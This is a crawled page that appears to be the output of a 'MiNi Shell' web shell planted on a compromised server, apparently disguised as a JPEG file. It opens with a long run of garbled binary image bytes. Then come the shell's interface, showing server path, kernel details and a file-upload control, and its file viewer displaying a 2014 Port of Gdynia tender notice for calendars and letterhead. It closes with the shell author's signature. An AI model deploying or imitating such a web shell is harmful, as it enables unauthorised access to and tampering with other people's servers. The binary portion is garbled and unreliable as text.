JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140729/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140729/252688-N-2014.html

<p class="kh_header"><b>Gdynia: Dostawa kalendarzy i listownika w ramach realizacji promocji projektu pn: Przebudowa nabrzeży w Porcie Gdynia - etap I Nabrzeże Rumuńskie, ubiegającego się o dofinansowanie ze środków Unii Europejskiej</b><br>
<b>Numer ogłoszenia: 252688 - 2014; data zamieszczenia: 29.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Morskiego Portu Gdynia S.A. , ul. Rotterdamska 9, 81-337 Gdynia, woj. pomorskie, tel. 058 627 40 36, faks 058 6274578.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.port.gdynia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Port morski.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa kalendarzy i listownika w ramach realizacji promocji projektu pn: Przebudowa nabrzeży w Porcie Gdynia - etap I Nabrzeże Rumuńskie, ubiegającego się o dofinansowanie ze środków Unii Europejskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W skład przedmiotu zamówienia wchodzą następujące elementy:
Kalendarze książkowe (formatu A4, A5 i kieszonkowe) i biurkowe (stojące menadżerskie na spirali) oraz papier listowy.

Opis kalendarzy według poszczególnych formatów:
1. Kalendarz książkowy - format A5
Format:	   150 x 205 mm lub zbliżony
Ilość:		   880 sztuk 
Rozkład dni:	   1 dzień - 1 strona, sobota i niedziela na jednej stronie
Kalendarium:   minimum PL-GB-D + imieniny i święta
Druk:		   2-kolorowy, szaro-bordowy , druk offsetowy wysokiej jakości
Papier:          70-80 g/m2, bezchlorowy,chamois 
Wykończenie: oprawa szyta, 2 zakładki atłasowe w kolorze bordowym i srebrnym 
o szerokości 5 mm, perforacja narożna, registry szaro-bordowe, wycinane, rogi kartek proste, obszerny notes teleadresowy (najwyżej dwie litery alfabetu na jednej stronie kartki) zintegrowany z kalendarium, wkładka z mapami z tyłu kalendarza: przynajmniej mapa samochodowa Polski oraz sąsiadów, strefy czasowe, tabele z odległościami, numerami kierunkowymi, walutami itp., wkładka reklamowa o objętości 4 stron w pełnym kolorze na papierze kredowym 120-140 g.
Oprawa kalendarza : 
- oprawa okładki wykonana z  materiału głęboko przetłaczanego (termoprzebarwialnego) w kolorze ciemnoniebieskim  o fakturze  grubo tkanego lnu, o półmatowym połysku,
- materiał położony bezpośrednio na piance co daje odczucie miękkości oprawy,
- przeszycie wzdłuż brzegu okładki  nicią o srebrnym/szarym kolorze, 
- rogi okładki zaokrąglone,
- wszyty pasek o szerokości min. 3 cm zamykający kalendarz na tzw. szlufkę -ewentualnie zapięcie z magnesem, wykonany ze skóropodobnej okleiny o gładkiej fakturze, matowej, w kolorze ciemnoniebieskim/granatowym . Pasek przeszyty wzdłuż krawędzi nicią podobnie jak okładka.
Tłoczenia:
- na przedniej stronie okładki : oryginalne tłoczenie uzgodnionego wzoru datownika (2015) oraz logo firmy - w uzgodnionych miejscach,
- na tylnej stronie okładki, u dołu - ciąg logotypów unijnych. 

2. Kalendarz książkowy - format A4
Format:	   210 x 280 mm lub zbliżony
Ilość:		   370 sztuk 
Rozkład dni:	   1 tydzień = 2 strony
Kalendarium:   minimum PL-GB-D + imieniny i święta
Druk:		   2-kolorowy, szaro-bordowy, druk offsetowy wysokiej jakości
Papier:	   70-80 g/m2, bezchlorowy, chamois, 
Wykończenie: oprawa szyta, 2 zakładki atłasowe w kolorze bordowym i srebrnym 
o szerokości 5 mm, perforacja narożna, registry szaro-bordowe, wycinane, rogi kartek proste, obszerny  notes teleadresowy (najwyżej dwie litery alfabetu na jednej stronie kartki) zintegrowany z kalendarium, wkładka z mapami z tyłu kalendarza: przynajmniej mapa samochodowa Polski oraz sąsiadów, strefy czasowe, tabele z odległościami, numerami kierunkowymi, walutami itp., wkładka reklamowa o objętości 4 stron w pełnym kolorze na papierze kredowym 120-140 g.
Oprawa kalendarza : 
- oprawa okładki wykonana z  materiału głęboko przetłaczanego 
(termoprzebarwialnego) w kolorze ciemnoniebieskim  o fakturze  grubo tkanego lnu , o półmatowym połysku 
- materiał położony bezpośrednio na piance co daje odczucie miękkości oprawy,
- przeszycie wzdłuż brzegu okładki nicią o srebrnym/szarym kolorze, 
- rogi okładki zaokrąglone,
- wszyty pasek o szerokości min. 3 cm zamykający kalendarz na tzw. szlufkę - ewentualnie zapięcie z magnesem, wykonany ze skóropodobnej okleiny o gładkiej fakturze, matowej, w kolorze ciemnoniebieskim/granatowym . Pasek przeszyty wzdłuż krawędzi nicią podobnie jak okładka.
Tłoczenia:
- na przedniej stronie okładki : oryginalne  tłoczenie uzgodnionego wzoru datownika (2015) oraz logo firmy - w uzgodnionych miejscach,
- na tylnej stronie okładki, u dołu - ciąg logotypów unijnych. 

3. Kalendarz kieszonkowy
Format:	   170 x 950  mm lub zbliżony
Ilość:		   710 sztuk 
Rozkład dni:	   1 tydzień = 2 strony (układ pionowy)
Kalendarium:   minimum PL-GB-D + imieniny i święta
Druk:		   2-kolorowy, szaro-bordowy, druk offsetowy wysokiej jakości
Papier:	   70-80 g/m2, bezchlorowy, chamois,
Wykończenie: oprawa szyta, 2 zakładki atłasowe w kolorze bordowym i srebrnym 
o szerokości 5 mm, perforacja narożna, rogi kartek proste, notes teleadresowy zintegrowany z kalendarium, wkładka reklamowa o objętości 4 stron w pełnym kolorze na papierze kredowym 120-140 g, wyklejka tylna z kolorową, komunikacyjną mapą Polski.
Oprawa kalendarza: 
- oprawa okładki wykonana z  materiału głęboko przetłaczanego
(termoprzebarwialnego) w kolorze ciemnoniebieskim o fakturze grubo tkanego lnu , o półmatowym połysku,
- wykończenie twarde - bez piankowania,
- przeszycie wzdłuż brzegu okładki nicią o srebrnym/szarym kolorze, 
- rogi okładki zaokrąglone,
- ten typ kalendarza - bez wszytego paska zamykającego kalendarz. 
Tłoczenia:  
- na przedniej stronie okładki : oryginalne tłoczenie uzgodnionego wzoru datownika (2015) oraz logo firmy - w uzgodnionych miejscach,   
- na tylnej stronie okładki, u dołu lub wzdłuż dłuższej krawędzi - ciąg logotypów unijnych. 

4. Kalendarz biurkowy stojący 
Format:	   300 x  150 mm lub zbliżony
Ilość:		   320 sztuk 
Rozkład dni:	   1 tydzień = 2 strony ( strona na 7 dni tygodnia + strona na notatki)
 (układ poziomy)
Kalendarium:  minimum PL-GB-D + imieniny i święta
Druk:		   2-kolorowy, szaro-bordowy, druk offsetowy wysokiej jakości
Papier:	   70-80 g/m2, bezchlorowy, chamois 

Wykończenie: 
Oprawa sztywna na spirali wzdłuż górnej, dłuższej krawędzi, o konstrukcji umożliwiającej położenie płaskie kalendarza na biurku i jego stabilne postawienie po rozłożeniu podstawy. 
Oprawa kalendarza: 
- oprawa okładki wykonana z  materiału głęboko przetłaczanego 
( termoprzebarwialnego) w kolorze ciemnoniebieskim o fakturze grubo tkanego lnu, o półmatowym połysku 
- wykończenie twarde - bez piankowania,
- rogi okładki proste,
- ten typ kalendarza - bez wszytego paska zamykającego kalendarz oraz bez przeszycia  wzdłuż brzegu okładki  nicią o srebrnym/szarym kolorze. 
Tłoczenia:  
- na przedniej stronie okładki:  oryginalne tłoczenie uzgodnionego wzoru datownika 
(2015) - w uzgodnionym miejscu,   
- na tylnej okładce, u dołu ( w miejscy widocznym przy położeniu /ustawieniu kalendarza na biurku) ) - ciąg logotypów unijnych. 

Uwaga:
Jako załącznik do przedstawianej oferty cenowej należy dostarczyć przynajmniej 
2 prototypy do okazania (tj. przykłady kalendarza książkowego formatu A4 lub A5, oraz kalendarza biurkowego, spełniające wymogi określone w SIWZ). 
Przy wycenie kalendarzy książkowych należy wziąć po uwagę, iż Zamawiający przewiduje zamówienie wyżej opisanych kalendarzy w 2 wersjach kolorystycznych oprawy w następujący sposób:
- w każdym typie kalendarzy 75% procent wielkości zamówienia danego rodzaju dotyczyć będzie oprawy w kolorze ciemnoniebieskim - pozostałe 25% wielkości zamówienia dotyczyć będzie tego samego typu oprawy, ale w innym kolorze, wybranym przez Zamawiającego z wzornika próbek . W związku z powyższym, jako załącznik do przedstawianej oferty cenowej należy dostarczyć, oprócz prototypów kalendarzy, wzornik dostępnych w ramach oferowanej ceny kolorów oprawy.

5. Listownik dla projektu 

Format: A4      
Łączna ilość: 3000 sztuk
Papier: gramatura  - co najmniej 100 g / m2
Papier Typu Zeta Laser lub inny o porównywalnej jakości (gładki, śnieżnobiały)  
Nadruk: pełno kolorowy - według projektu przedstawionego przez Zamawiającego.
Zadruk metodą litografii offsetowej lub druku wklęsłego
Odporność farby do 180 oC
Jako załącznik do przedstawianej oferty cenowej należy dostarczyć, również wzór papieru przeznaczonego na ww. listownik ( może być z przykładowymi lub bez nadruków)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.61.00-0, 30.19.97.20-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Próbki w postaci prototypów kalendarza książkowego formatu A4 lub A5 oraz kalendarza biurkowego, wzór papieru listowego wraz z przykładowymi nadrukami lub bez nadruku oraz wzornik dostępnych w ramach oferowanej ceny kolorów oprawy kalendarza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Ocena jakości - 40</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.port.gdynia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.port.gdynia.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.08.2014 godzina 10:30, miejsce: Zarząd Morskiego Portu Gdynia S.A. przy ul. Rotterdamskiej 9 81-337 Gdynia, Dział Umów i Rozliczeń, pokój nr 330.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja Przebudowa nabrzeży w Porcie Gdynia - etap I Nabrzeże Rumuńskie jest przewidziana do ubiegania się o współfinansowanie ze środków Unii Europejskiej. Inwestycja jest umieszczona na aktualnej liście projektów indywidualnych dla Programu Operacyjnego Infrastruktura i Środowisko 2007 - 2013, pod pozycją 7.2-35. Lista projektów indywidualnych przewidzianych do realizacji publikowana jest na stronie Ministerstwa Rozwoju Regionalnego, a informacja o jej zamieszczeniu ogłaszana jest w formie komunikatu w Dzienniku Urzędowym Rzeczpospolitej Polskiej Monitor Polski. Lista projektów indywidualnych jest weryfikowana przez Ministra Rozwoju Regionalnego co pół roku i jest dostępna na stronie internetowej Programu Operacyjnego Infrastruktura i Środowisko..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com